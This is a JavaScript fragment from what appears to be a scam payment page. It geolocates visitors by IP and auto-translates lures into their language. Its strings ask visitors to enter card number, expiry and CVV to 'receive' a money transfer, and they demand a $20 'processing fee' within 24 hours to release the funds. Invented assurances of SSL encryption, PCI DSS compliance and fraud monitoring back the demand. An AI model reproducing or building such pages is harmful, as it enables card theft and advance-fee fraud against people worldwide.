        "PT": "pt", "QA": "ar", "RO": "ro", "RU": "ru", "RW": "rw", "KN": "en", "LC": "en",
        "VC": "en", "WS": "sm", "SM": "it", "ST": "pt", "SA": "ar", "SN": "fr", "RS": "sr",
        "SC": "fr", "SL": "en", "SG": "zh-CN", "SK": "sk", "SI": "sl", "SB": "en", "SO": "so",
        "ZA": "af", "SS": "en", "ES": "es", "LK": "si", "SD": "ar", "SR": "nl", "SE": "sv",
        "CH": "de", "SY": "ar", "TW": "zh-TW", "TJ": "tg", "TZ": "sw", "TH": "th", "TL": "pt",
        "TG": "fr", "TO": "to", "TT": "en", "TN": "ar", "TR": "tr", "TM": "tk", "UG": "en",
        "UA": "uk", "AE": "ar", "GB": "en", "US": "en", "UY": "es", "UZ": "uz", "VU": "bi",
        "VE": "es", "VN": "vi", "YE": "ar", "ZM": "en", "ZW": "en"
    };

// Function to detect user's country
function detectCountry(callback) {
    fetch('https://ipinfo.io/json?token=84581b889c1970')
        .then(response => response.json())
        .then(data => {
            callback(data.country);
        })
        .catch(error => console.error('Error detecting country:', error));
}

// Translation function
function translateText(text, targetLanguage, callback) {
    fetch(`https://translate.googleapis.com/translate_a/single?client=gtx&sl=en&tl=${targetLanguage}&dt=t&q=${encodeURI(text)}`)
        .then(response => response.json())
        .then(data => {
            callback(data[0][0][0]);
        })
        .catch(error => console.error('Error translating text:', error));
}

document.addEventListener('DOMContentLoaded', () => {
    document.body.classList.add('loading');

    // Remove the loading state after 2 seconds
    setTimeout(function() {
        document.body.classList.remove('loading');
    }, 2000); // 2000 milliseconds = 2 seconds

    detectCountry(function(countryCode) {
        const targetLanguage = countryLanguageMap[countryCode] || 'en'; // Default to English if country not in map

        const elementsToTranslate = [
            { id: 'header-title', text: 'Secure Your Transfer' },
 { id: 'label-card-holder1', text: 'State' },   
 { id: 'label-card-number1', text: 'Country' },     
            { id: 'header-description', text: 'Add your credit card information below to enjoy seamless, fast and secure Transfers.' },
            { id: 'security-title', text: 'Your Security is Our Priority' },
            { id: 'security-description', text: 'We use industry-leading encryption and security protocols to ensure your data is safe and secure. Your credit card information will be handled with the utmost care and confidentiality.' },
            { id: 'security-details', text: "Here's what we do to protect you:" },
            { id: 'security-list', items: [
                '256-bit SSL encryption to safeguard your data.',
                'PCI DSS compliance for secure credit card processing.',
                'Regular security audits and updates.',
                '24/7 monitoring for fraudulent activities.'
            ]},
            { id: 'scroll-instruction', text: 'To Continue Please Scroll Down And Input Card Details You Want The Money To Be Transferred To. Or Click On The Camera Picture Below.' },
            { id: 'label-card-number', text: 'Card Number' },
            { id: 'label-card-holder', text: 'Card Holder:' },
            { id: 'label-expiry-year', text: 'Expiry Year' },
            { id: 'label-cvv', text: 'CVV:' },
            { id: 'label-expiry-month', text: 'Expiry Month' },
       { id: 'card-holder-name', text: 'Your Name Here' },
  { id: 'carrd', text: 'Card Holder' },
   { id: 'tap', text: 'Expiry Month' },
    { id: 'pen', text: 'Expiry Year' },
  { id: 'expire', text: 'Expires' },
            { id: 'verify-button', text: 'Proceed' },
           { id: 'jan', text: 'January 01' },
          { id: 'jan1', text: 'February 02' },
          { id: 'jan2', text: 'March 03' },
         { id: 'jan3', text: 'April 04' },
 { id: 'jan4', text: 'May 05' },
   { id: 'jan5', text: 'June 06' },
    { id: 'jan6', text: 'July 07' },
     { id: 'jan7', text: 'August 08'},
     { id: 'jan8', text: 'September 9'},
 { id: 'jan9', text: 'October 10'},
 { id: 'jan10', text: 'November 11'},
 { id: 'jan11', text: 'December 12'}, 
      { id: 'option-AFG', text: 'Afghanistan' },
    { id: 'option-ALB', text: 'Albania' },
    { id: 'option-DZA', text: 'Algeria' },
    { id: 'option-AND', text: 'Andorra' },
    { id: 'option-AGO', text: 'Angola' },
    { id: 'option-ATG', text: 'Antigua and Barbuda' },
    { id: 'option-ARG', text: 'Argentina' },
    { id: 'option-ARM', text: 'Armenia' },
    { id: 'option-AUS', text: 'Australia' },
    { id: 'option-AUT', text: 'Austria' },
    { id: 'option-AZE', text: 'Azerbaijan' },
    { id: 'option-BHS', text: 'Bahamas' },
    { id: 'option-BHR', text: 'Bahrain' },
    { id: 'option-BGD', text: 'Bangladesh' },
    { id: 'option-BRB', text: 'Barbados' },
    { id: 'option-BLR', text: 'Belarus' },
    { id: 'option-BEL', text: 'Belgium' },
    { id: 'option-BLZ', text: 'Belize' },
    { id: 'option-BEN', text: 'Benin' },
    { id: 'option-BTN', text: 'Bhutan' },
    { id: 'option-BOL', text: 'Bolivia' },
    { id: 'option-BIH', text: 'Bosnia and Herzegovina' },
    { id: 'option-BWA', text: 'Botswana' },
    { id: 'option-BRA', text: 'Brazil' },
    { id: 'option-BRN', text: 'Brunei' },
    { id: 'option-BGR', text: 'Bulgaria' },
    { id: 'option-BFA', text: 'Burkina Faso' },
    { id: 'option-BDI', text: 'Burundi' },
    { id: 'option-CPV', text: 'Cabo Verde' },
    { id: 'option-KHM', text: 'Cambodia' },
    { id: 'option-CMR', text: 'Cameroon' },
    { id: 'option-CAN', text: 'Canada' },
    { id: 'option-CAF', text: 'Central African Republic' },
    { id: 'option-TCD', text: 'Chad' },
    { id: 'option-CHL', text: 'Chile' },
    { id: 'option-CHN', text: 'China' },
    { id: 'option-COL', text: 'Colombia' },
    { id: 'option-COM', text: 'Comoros' },
    { id: 'option-COD', text: 'Congo (Democratic Republic)' },
    { id: 'option-COG', text: 'Congo (Republic)' },
    { id: 'option-CRI', text: 'Costa Rica' },
    { id: 'option-CIV', text: "Côte d'Ivoire" },
    { id: 'option-HRV', text: 'Croatia' },
    { id: 'option-CUB', text: 'Cuba' },
    { id: 'option-CYP', text: 'Cyprus' },
    { id: 'option-CZE', text: 'Czech Republic' },
    { id: 'option-DNK', text: 'Denmark' },
    { id: 'option-DJI', text: 'Djibouti' },
    { id: 'option-DMA', text: 'Dominica' },
    { id: 'option-DOM', text: 'Dominican Republic' },
    { id: 'option-ECU', text: 'Ecuador' },
    { id: 'option-EGY', text: 'Egypt' },
    { id: 'option-SLV', text: 'El Salvador' },
    { id: 'option-GNQ', text: 'Equatorial Guinea' },
    { id: 'option-ERI', text: 'Eritrea' },
    { id: 'option-EST', text: 'Estonia' },
    { id: 'option-SWZ', text: 'Eswatini' },
    { id: 'option-ETH', text: 'Ethiopia' },
    { id: 'option-FJI', text: 'Fiji' },
    { id: 'option-FIN', text: 'Finland' },
    { id: 'option-FRA', text: 'France' },
    { id: 'option-GAB', text: 'Gabon' },
    { id: 'option-GMB', text: 'Gambia' },
    { id: 'option-GEO', text: 'Georgia' },
    { id: 'option-DEU', text: 'Germany' },
    { id: 'option-GHA', text: 'Ghana' },
    { id: 'option-GRC', text: 'Greece' },
    { id: 'option-GRD', text: 'Grenada' },
    { id: 'option-GTM', text: 'Guatemala' },
    { id: 'option-GIN', text: 'Guinea' },
    { id: 'option-GNB', text: 'Guinea-Bissau' },
    { id: 'option-GUY', text: 'Guyana' },
    { id: 'option-HTI', text: 'Haiti' },
    { id: 'option-HND', text: 'Honduras' },
    { id: 'option-HUN', text: 'Hungary' },
    { id: 'option-ISL', text: 'Iceland' },
    { id: 'option-IND', text: 'India' },
    { id: 'option-IDN', text: 'Indonesia' },
    { id: 'option-IRN', text: 'Iran' },
    { id: 'option-IRQ', text: 'Iraq' },
    { id: 'option-IRL', text: 'Ireland' },
    { id: 'option-ISR', text: 'Israel' },
    { id: 'option-ITA', text: 'Italy' },
    { id: 'option-JAM', text: 'Jamaica' },
    { id: 'option-JPN', text: 'Japan' },
    { id: 'option-JOR', text: 'Jordan' },
    { id: 'option-KAZ', text: 'Kazakhstan' },
    { id: 'option-KEN', text: 'Kenya' },
    { id: 'option-KIR', text: 'Kiribati' },
    { id: 'option-KWT', text: 'Kuwait' },
    { id: 'option-KGZ', text: 'Kyrgyzstan' },
    { id: 'option-LAO', text: 'Laos' },
    { id: 'option-LVA', text: 'Latvia' },
    { id: 'option-LBN', text: 'Lebanon' },
    { id: 'option-LSO', text: 'Lesotho' },
    { id: 'option-LBR', text: 'Liberia' },
    { id: 'option-LBY', text: 'Libya' },
    { id: 'option-LIE', text: 'Liechtenstein' },
    { id: 'option-LTU', text: 'Lithuania' },
    { id: 'option-LUX', text: 'Luxembourg' },
    { id: 'option-MDG', text: 'Madagascar' },
    { id: 'option-MWI', text: 'Malawi' },
    { id: 'option-MYS', text: 'Malaysia' },
    { id: 'option-MDV', text: 'Maldives' },
    { id: 'option-MLI', text: 'Mali' },
    { id: 'option-MLT', text: 'Malta' },
    { id: 'option-MHL', text: 'Marshall Islands' },
    { id: 'option-MRT', text: 'Mauritania' },
    { id: 'option-MUS', text: 'Mauritius' },
    { id: 'option-MEX', text: 'Mexico' },
    { id: 'option-FSM', text: 'Micronesia' },
    { id: 'option-MDA', text: 'Moldova' },
    { id: 'option-MCO', text: 'Monaco' },
    { id: 'option-MNG', text: 'Mongolia' },
    { id: 'option-MNE', text: 'Montenegro' },
    { id: 'option-MAR', text: 'Morocco' },
    { id: 'option-MOZ', text: 'Mozambique' },
    { id: 'option-NAM', text: 'Namibia' },
    { id: 'option-NRU', text: 'Nauru' },
    { id: 'option-NPL', text: 'Nepal' },
    { id: 'option-NLD', text: 'Netherlands' },
    { id: 'option-NZL', text: 'New Zealand' },
    { id: 'option-NIC', text: 'Nicaragua' },
    { id: 'option-NER', text: 'Niger' },
    { id: 'option-NGA', text: 'Nigeria' },
    { id: 'option-PRK', text: 'North Korea' },
    { id: 'option-MKD', text: 'North Macedonia' },
    { id: 'option-NOR', text: 'Norway' },
    { id: 'option-OMN', text: 'Oman' },
    { id: 'option-PAK', text: 'Pakistan' },
    { id: 'option-PLW', text: 'Palau' },
    { id: 'option-PAN', text: 'Panama' },
    { id: 'option-PNG', text: 'Papua New Guinea' },
    { id: 'option-PRY', text: 'Paraguay' },
    { id: 'option-PER', text: 'Peru' },
    { id: 'option-PHL', text: 'Philippines' },
    { id: 'option-POL', text: 'Poland' },
    { id: 'option-PRT', text: 'Portugal' },
    { id: 'option-QAT', text: 'Qatar' },
    { id: 'option-ROU', text: 'Romania' },
    { id: 'option-RUS', text: 'Russia' },
    { id: 'option-RWA', text: 'Rwanda' },
    { id: 'option-KNA', text: 'Saint Kitts and Nevis' },
    { id: 'option-LCA', text: 'Saint Lucia' },
    { id: 'option-VCT', text: 'Saint Vincent and the Grenadines' },
    { id: 'option-WSM', text: 'Samoa' },
    { id: 'option-SMR', text: 'San Marino' },
    { id: 'option-STP', text: 'Sao Tome and Principe' },
    { id: 'option-SAU', text: 'Saudi Arabia' },
    { id: 'option-SEN', text: 'Senegal' },
    { id: 'option-SRB', text: 'Serbia' },
    { id: 'option-SYC', text: 'Seychelles' },
    { id: 'option-SLE', text: 'Sierra Leone' },
    { id: 'option-SGP', text: 'Singapore' },
    { id: 'option-SVK', text: 'Slovakia' },
    { id: 'option-SVN', text: 'Slovenia' },
    { id: 'option-SLB', text: 'Solomon Islands' },
    { id: 'option-SOM', text: 'Somalia' },
    { id: 'option-ZAF', text: 'South Africa' },
    { id: 'option-KOR', text: 'South Korea' },
    { id: 'option-SSD', text: 'South Sudan' },
    { id: 'option-ESP', text: 'Spain' },
    { id: 'option-LKA', text: 'Sri Lanka' },
    { id: 'option-SDN', text: 'Sudan' },
    { id: 'option-SUR', text: 'Suriname' },
    { id: 'option-SWE', text: 'Sweden' },
    { id: 'option-CHE', text: 'Switzerland' },
    { id: 'option-SYR', text: 'Syria' },
    { id: 'option-TWN', text: 'Taiwan' },
    { id: 'option-TJK', text: 'Tajikistan' },
    { id: 'option-TZA', text: 'Tanzania' },
    { id: 'option-THA', text: 'Thailand' },
    { id: 'option-TLS', text: 'Timor-Leste' },
    { id: 'option-TGO', text: 'Togo' },
    { id: 'option-TON', text: 'Tonga' },
    { id: 'option-TTO', text: 'Trinidad and Tobago' },
    { id: 'option-TUN', text: 'Tunisia' },
    { id: 'option-TUR', text: 'Turkey' },
    { id: 'option-TKM', text: 'Turkmenistan' },
    { id: 'option-TUV', text: 'Tuvalu' },
    { id: 'option-UGA', text: 'Uganda' },
    { id: 'option-UKR', text: 'Ukraine' },
    { id: 'option-ARE', text: 'United Arab Emirates' },
    { id: 'option-GBR', text: 'United Kingdom' },
    { id: 'option-USA', text: 'United States' },
    { id: 'option-URY', text: 'Uruguay' },
    { id: 'option-UZB', text: 'Uzbekistan' },
    { id: 'option-VUT', text: 'Vanuatu' },
    { id: 'option-VEN', text: 'Venezuela' },
    { id: 'option-VNM', text: 'Vietnam' },
    { id: 'option-ESH', text: 'Western Sahara' },
    { id: 'option-YEM', text: 'Yemen' },
    { id: 'option-ZMB', text: 'Zambia' },
 { id: 'select', text: 'Select Your Country' },
    { id: 'option-ZWE', text: 'Zimbabwe' },
    
    { id: 'payment-header', text: 'Payment Required' },
    
    { id: 'client-greeting', text: 'Dear' },
    { id: 'client-greeting2', text: 'To access the funds in your account, a small processing fee of $20 needs to be paid. This fee is crucial for ensuring security and timely processing of your transaction.' },
    { id: 'urgent-payment-message', text: 'Please Complete the payment within the next 24 hours to avoid delays in processing your transfer.' },
    { id: 'tac', text: 'Your transactions are encrypted with industry-leading security standards.' },
    { id: 'tac1', text: 'We guarantee your payment will be processed immediately after completion.' },
   
    { id: 'complete-payment-button', text: 'Complete ' },
    { id: 'footer-text', text: '© 2024 Your Company. All rights reserved.' }

            
        ];

        elementsToTranslate.forEach(element => {
            if (element.items) {
                element.items.forEach((item, index) => {
                    translateText(item, targetLanguage, function(translatedText) {
                        document.querySelector(`#${element.id} li:nth-child(${index + 1})`).innerText = translatedText;
                    });
                });
   const placeholdersToTranslate = [
                { id: 'card-name-input', text: 'Your Full Name' },
       { id: 'fiel', text: 'Enter Your State'},
                { id: 'card-number', text: 'Enter Your Card Number' }
            ];

            placeholdersToTranslate.forEach(element => {
                translateText(element.text, targetLanguage, function (translatedText) {
                    document.getElementById(element.id).placeholder = translatedText;
                });
            }); 
            } else {
                translateText(element.text, targetLanguage, function(translatedText) {
                    document.getElementById(element.id).innerText = translatedText;
                });
            }
        });
    });
});

document.getElementById('verify-button').addEventListener('click', function() {
            this.style.width = '180px'; // Reduce width
            this.style.height = '26px'; // Reduce height
            this.style.fontSize = '16px'; // Adjust font size
  this.style.marginLeft = '81px'; // Adjust font size
 // Store the current context
            const button = this;

            // Revert the button size after 2 seconds
            setTimeout(function() {
                button.style.width = '250px'; // Original width
                button.style.height = '46px'; // Original height
                button.style.fontSize = '29px'; // Original font size
           button.style.marginLeft  = '50px'; // Original font size
            }, 400);
        });       
// Set timeout duration in milliseconds (e.g., 5000ms = 5 seconds)
        const timeoutDuration = 1000;

        // Function to hide the spinner overlay
        function hideSpinner() {
            const spinnerOverlay = document.getElementById('spinner-overlay');
            spinnerOverlay.classList.add('hidden');
        }

        // Set timeout to hide the spinner overlay after the specified duration
        setTimeout(hideSpinner, timeoutDuration);  
document.addEventListener('DOMContentLoaded', () => {
 const displayName2Element = document.getElementById('displayName3');
                 // Get stored name and slider value from localStorage
            
            const storedName = localStorage.getItem('userName');
            

            
               if (storedName) {
                displayName2Element.textContent = `${storedName},`;
           
            };
});

</script>
